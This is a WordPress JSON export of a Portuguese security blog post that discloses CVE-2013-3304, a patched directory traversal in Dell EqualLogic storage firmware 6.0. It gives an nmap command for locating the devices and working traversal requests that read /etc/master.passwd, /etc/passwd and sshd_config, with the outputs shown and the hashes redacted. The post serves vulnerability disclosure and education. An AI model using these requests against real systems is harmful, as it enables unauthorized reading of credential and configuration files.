{"id":271,"date":"2014-10-30T21:06:30","date_gmt":"2014-10-30T21:06:30","guid":{"rendered":"https:\/\/www.xlabs.com.br\/blog\/?p=271"},"modified":"2021-08-25T17:45:37","modified_gmt":"2021-08-25T20:45:37","slug":"entendendo-a-falha-cve-2013-3304-2","status":"publish","type":"post","link":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/","title":{"rendered":"Entendendo a falha CVE-2013-3304"},"content":{"rendered":"<p>No artigo a seguir iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.<\/p>\n<p>A&nbsp;falha de CVE 2013-3304 n\u00e3o possui muitas informa\u00e7\u00f5es na internet , as informa\u00e7\u00f5es que encontramos s\u00e3o escassas e sem detalhes t\u00e9cnicos para efetuar o POC (Proof Of Concept) ou prova de conceito da vulnerabilidade que afeta os sistemas Dell Storage Equalogic.<\/p>\n<p>Os testes foram efetuados em redes de empresas, as quais nosso diretor&nbsp;fez parte do time de seguran\u00e7a, a falha se trata de um Directory Traversal e esta presente em toda a linha de Storages Equalogic da empresa Dell Computer Corporation com firmware vers\u00e3o 6.0,&nbsp;a seguir demonstraremos maiores informa\u00e7\u00f5es da mesma.<\/p>\n<p>Dell EqualLogic 6.0 Directory Traversal<\/p>\n<p>## Informa\u00e7\u00f5es##<br \/>\nModelo Equipamento: Dell EqualLogic PS4000<\/p>\n<p>http:\/\/www.dell.com\/br\/empresa\/p\/equallogic-ps4000e\/pd<\/p>\n<p>Firmware Version: 6.0<\/p>\n<p>#########################################################################<\/p>\n<p>##Informa\u00e7\u00f5es NMAP##<\/p>\n<p>Running: Dell embedded, Dell NetBSD 1.X<\/p>\n<p>OS CPE: cpe:\/h:dell:equallogic cpe:\/o:dell:netbsd:1<\/p>\n<p>OS details: Dell EqualLogic PeerStorage PS3000 or PS4000 NAS device, Dell EqualLogic NAS device (NetBSD 1.6.2)<br \/>\n#################################<\/p>\n<p>Atrav\u00e9s de um erro ao abrir a aplica\u00e7\u00e3o no browser \u00e9 poss\u00edvel identificar a localiza\u00e7\u00e3o dos arquivos .jar do sistema.<\/p>\n<p><a href=\"\/blog\/wp-content\/uploads\/2013\/09\/Console_contendo_Erro_Provocado_na_app.jpg\"><img decoding=\"async\" class=\"aligncenter  wp-image-51\" src=\"\/blog\/wp-content\/uploads\/2013\/09\/Console_contendo_Erro_Provocado_na_app-300x167.jpg\" alt=\"Console_contendo_Erro_Provocado_na_app\" width=\"572\" height=\"318\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Console_contendo_Erro_Provocado_na_app-300x167.jpg 300w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Console_contendo_Erro_Provocado_na_app.jpg 870w\" sizes=\"(max-width: 572px) 100vw, 572px\" \/><\/a><\/p>\n<h4><\/h4>\n<p>O Download dos Jar pode ser acessado atrav\u00e9s&nbsp;dos links:<\/p>\n<p>http:\/\/[host]\/lib\/equallogic-6.0.jar<br \/>\nhttp:\/\/[host]\/lib\/plastic_laf-6.0.jar<\/p>\n<h4><\/h4>\n<p>Ap\u00f3s o download&nbsp;\u00e9 poss\u00edvel&nbsp;decompilar os arquivos com o Java-Decompiler ou JD.<\/p>\n<p><a href=\"\/blog\/wp-content\/uploads\/2013\/09\/Decode_STCPComm.class.jpg\"><img decoding=\"async\" class=\"aligncenter  wp-image-52\" src=\"\/blog\/wp-content\/uploads\/2013\/09\/Decode_STCPComm.class-300x150.jpg\" alt=\"Decode_STCPComm.class\" width=\"578\" height=\"289\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Decode_STCPComm.class-300x150.jpg 300w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Decode_STCPComm.class-1024x514.jpg 1024w\" sizes=\"(max-width: 578px) 100vw, 578px\" \/><\/a><\/p>\n<h4><\/h4>\n<p>Atrav\u00e9s da an\u00e1lise de c\u00f3digo&nbsp;\u00e9 poss\u00edvel identificar&nbsp;os padr\u00f5es de comunica\u00e7\u00e3o da aplica\u00e7\u00e3o e as portas que podem diferenciar os sistemas de Storage da Dell das demais m\u00e1quinas da rede, como podemos ver na imagem acima a forma de identifica\u00e7\u00e3o das m\u00e1quinas vulner\u00e1veis na rede seria por defini\u00e7\u00f5es de portas, por exemplo, com o&nbsp; comando a seguir&nbsp;listam-se os Storages da rede:<\/p>\n<p>nmap -p 3003,3002 -Pn [IP RANGE]<\/p>\n<h4><\/h4>\n<p><a href=\"\/blog\/wp-content\/uploads\/2013\/09\/NmapScanDOS.jpg\"><img decoding=\"async\" class=\"aligncenter  wp-image-54\" src=\"\/blog\/wp-content\/uploads\/2013\/09\/NmapScanDOS-300x89.jpg\" alt=\"NmapScanDOS\" width=\"704\" height=\"209\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/NmapScanDOS-300x89.jpg 300w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/NmapScanDOS.jpg 683w\" sizes=\"(max-width: 704px) 100vw, 704px\" \/><\/a><\/p>\n<h4><\/h4>\n<p>No NmapGUI<\/p>\n<p><a href=\"\/blog\/wp-content\/uploads\/2013\/09\/NMapScanGUI2.jpg\"><img decoding=\"async\" class=\"aligncenter  wp-image-55\" src=\"\/blog\/wp-content\/uploads\/2013\/09\/NMapScanGUI2-257x300.jpg\" alt=\"NMapScanGUI2\" width=\"456\" height=\"533\"><\/a><\/p>\n<h4><\/h4>\n<p>Vulnerabilidade:<\/p>\n<p>GET \/\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/master.passwd<br \/>\nroot:[hash] &amp;:\/root:\/bin\/sh<br \/>\ndaemon:*:[hash]::0:0:The devil himself:\/:\/sbin\/nologin<br \/>\noperator:*:[hash]::0:0:System &amp;:\/usr\/guest\/operator:\/sbin\/nologin<br \/>\nbin:*:[hash]::0:0:Binaries Commands and Source:\/:\/sbin\/nologin<br \/>\nsshd:*:[hash]:0:0:SSH pseudo-user:\/var\/chroot\/sshd:\/sbin\/nologin<br \/>\nuucp:*:[hash]:UNIX-to-UNIX Copy:\/var\/spool\/uucppublic:\/usr\/libexec\/uucp\/uucico<br \/>\nnobody:*:[hash]:Unprivileged user:\/nonexistent:\/sbin\/nologin<br \/>\ngrpadmin:[hash]:Group Manager Admin Account:\/mgtdb\/update:\/usr\/bin\/Cli<br \/>\nauthgroup:[hash]:Group Authenication Account:\/:\/sbin\/nologin<br \/>\n0<br \/>\nGET \/\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/p>\n<p>root:*:[hash]:Charlie &amp;:\/root:\/bin\/sh<br \/>\ndaemon:*:[hash]:The devil himself:\/:\/sbin\/nologin<br \/>\noperator:*:[hash]:System &amp;:\/usr\/guest\/operator:\/sbin\/nologin<br \/>\nbin:*::Binaries Commands and Source:\/:\/sbin\/nologin<br \/>\nsshd:*:[hash]:SSH pseudo-user:\/var\/chroot\/sshd:\/sbin\/nologin<br \/>\nuucp:*[hash]:1:UNIX-to-UNIX Copy:\/var\/spool\/uucppublic:\/usr\/libexec\/uucp\/uucico<br \/>\nnobody:*:[hash]:Unprivileged user:\/nonexistent:\/sbin\/nologin<br \/>\ngrpadmin:*:[hash]Group Manager Admin Account:\/mgtdb\/update:\/usr\/bin\/Cli<br \/>\nauthgroup:*:[hash]0:Group Authenication Account:\/:\/sbin\/nologin<\/p>\n<p>0<\/p>\n<h4><\/h4>\n<p>Como foi poss\u00edvel perceber, a falha \u00e9 grave por\u00e9m n\u00e3o \u00e9 cr\u00edtica, ainda n\u00e3o sabemos a extens\u00e3o da falha pois o escopo foi limitado nestes testes, nota-se que arquivos de configura\u00e7\u00f5es de todo o sistema podem ser lidos.<\/p>\n<p><a href=\"\/blog\/wp-content\/uploads\/2013\/09\/Directory_TraversalJPG2.jpg\"><img decoding=\"async\" class=\"aligncenter  wp-image-56\" src=\"\/blog\/wp-content\/uploads\/2013\/09\/Directory_TraversalJPG2-300x152.jpg\" alt=\"Directory_TraversalJPG2\" width=\"616\" height=\"312\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Directory_TraversalJPG2-300x152.jpg 300w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Directory_TraversalJPG2-1024x521.jpg 1024w\" sizes=\"(max-width: 616px) 100vw, 616px\" \/><\/a><\/p>\n<h4><\/h4>\n<p>O sistema em si trata-se de um NetBSD&nbsp;podendo ser&nbsp;constatado lendo o arquivo de configura\u00e7\u00e3o do SSHD:<\/p>\n<p>GET \/\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/ssh\/sshd_config HTTP\/1.1<\/p>\n<p># $NetBSD: sshd_config,v 1.16 2002\/10\/01 14:07:47 itojun Exp $<\/p>\n<h4><\/h4>\n<p>A falha foi corrigida na nova vers\u00e3o dos firmwares da linha Equalogic da Dell.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>No artigo a seguir iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware. A&nbsp;falha de CVE 2013-3304 n\u00e3o possui muitas informa\u00e7\u00f5es na internet , as informa\u00e7\u00f5es que encontramos s\u00e3o escassas e sem [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1583,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[18,64,63,62],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Entendendo a falha CVE-2013-3304 &ndash; XLabs Security Blog<\/title>\n<meta name=\"description\" content=\"No artigo a seguir, iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell...\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Entendendo a falha CVE-2013-3304 &ndash; XLabs Security Blog\" \/>\n<meta property=\"og:description\" content=\"No artigo a seguir, iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/\" \/>\n<meta property=\"og:site_name\" content=\"XLabs Security Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/xlabs\" \/>\n<meta property=\"article:published_time\" content=\"2014-10-30T21:06:30+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-25T20:45:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2014\/10\/entendendo-a-falha-cve-2013-3304-blog-post-xlabs.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"488\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Mauricio Corr\u00eaa\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Entendendo a falha CVE-2013-3304 &ndash; XLabs Security Blog\" \/>\n<meta name=\"twitter:description\" content=\"No artigo a seguir, iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2014\/10\/entendendo-a-falha-cve-2013-3304-blog-post-xlabs.png\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mauricio Corr\u00eaa\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/\"},\"author\":{\"name\":\"Mauricio Corr\u00eaa\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\"},\"headline\":\"Entendendo a falha CVE-2013-3304\",\"datePublished\":\"2014-10-30T21:06:30+00:00\",\"dateModified\":\"2021-08-25T20:45:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/\"},\"wordCount\":599,\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"keywords\":[\"CVE-2013-3304\",\"Dell EqualLogic\",\"Dell Storage\",\"Entendendo CVE-2013-3304\"],\"articleSection\":[\"Artigos\"],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/\",\"name\":\"Entendendo a falha CVE-2013-3304 &ndash; XLabs Security Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\"},\"datePublished\":\"2014-10-30T21:06:30+00:00\",\"dateModified\":\"2021-08-25T20:45:37+00:00\",\"description\":\"No artigo a seguir, iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell...\",\"breadcrumb\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/www.xlabs.com.br\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Entendendo a falha CVE-2013-3304\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"name\":\"XLabs Security Blog\",\"description\":\"Seguran\u00e7a da Informa\u00e7\u00e3o\",\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\",\"name\":\"XLabs Security\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"contentUrl\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"width\":478,\"height\":168,\"caption\":\"XLabs Security\"},\"image\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.instagram.com\/xlabs.security\",\"https:\/\/www.linkedin.com\/company\/xlabs-security\/\",\"https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber\",\"https:\/\/www.facebook.com\/xlabs\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\",\"name\":\"Mauricio Corr\u00eaa\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"caption\":\"Mauricio Corr\u00eaa\"},\"url\":\"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Entendendo a falha CVE-2013-3304 &ndash; XLabs Security Blog","description":"No artigo a seguir, iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell...","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/","og_locale":"pt_BR","og_type":"article","og_title":"Entendendo a falha CVE-2013-3304 &ndash; XLabs Security Blog","og_description":"No artigo a seguir, iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.","og_url":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/","og_site_name":"XLabs Security Blog","article_publisher":"https:\/\/www.facebook.com\/xlabs","article_published_time":"2014-10-30T21:06:30+00:00","article_modified_time":"2021-08-25T20:45:37+00:00","og_image":[{"width":1000,"height":488,"url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2014\/10\/entendendo-a-falha-cve-2013-3304-blog-post-xlabs.png","type":"image\/png"}],"author":"Mauricio Corr\u00eaa","twitter_card":"summary_large_image","twitter_title":"Entendendo a falha CVE-2013-3304 &ndash; XLabs Security Blog","twitter_description":"No artigo a seguir, iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.","twitter_image":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2014\/10\/entendendo-a-falha-cve-2013-3304-blog-post-xlabs.png","twitter_misc":{"Escrito por":"Mauricio Corr\u00eaa","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/#article","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/"},"author":{"name":"Mauricio Corr\u00eaa","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d"},"headline":"Entendendo a falha CVE-2013-3304","datePublished":"2014-10-30T21:06:30+00:00","dateModified":"2021-08-25T20:45:37+00:00","mainEntityOfPage":{"@id":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/"},"wordCount":599,"publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"keywords":["CVE-2013-3304","Dell EqualLogic","Dell Storage","Entendendo CVE-2013-3304"],"articleSection":["Artigos"],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/","url":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/","name":"Entendendo a falha CVE-2013-3304 &ndash; XLabs Security Blog","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#website"},"datePublished":"2014-10-30T21:06:30+00:00","dateModified":"2021-08-25T20:45:37+00:00","description":"No artigo a seguir, iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nosso diretor e reportada a empresa Dell...","breadcrumb":{"@id":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.xlabs.com.br\/blog\/entendendo-a-falha-cve-2013-3304-2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/www.xlabs.com.br\/blog\/"},{"@type":"ListItem","position":2,"name":"Entendendo a falha CVE-2013-3304"}]},{"@type":"WebSite","@id":"https:\/\/www.xlabs.com.br\/blog\/#website","url":"https:\/\/www.xlabs.com.br\/blog\/","name":"XLabs Security Blog","description":"Seguran\u00e7a da Informa\u00e7\u00e3o","publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/www.xlabs.com.br\/blog\/#organization","name":"XLabs Security","url":"https:\/\/www.xlabs.com.br\/blog\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","contentUrl":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","width":478,"height":168,"caption":"XLabs Security"},"image":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.instagram.com\/xlabs.security","https:\/\/www.linkedin.com\/company\/xlabs-security\/","https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber","https:\/\/www.facebook.com\/xlabs"]},{"@type":"Person","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d","name":"Mauricio Corr\u00eaa","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","caption":"Mauricio Corr\u00eaa"},"url":"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/"}]}},"_links":{"self":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/271"}],"collection":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/comments?post=271"}],"version-history":[{"count":8,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/271\/revisions"}],"predecessor-version":[{"id":1633,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/271\/revisions\/1633"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media\/1583"}],"wp:attachment":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media?parent=271"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/categories?post=271"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/tags?post=271"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}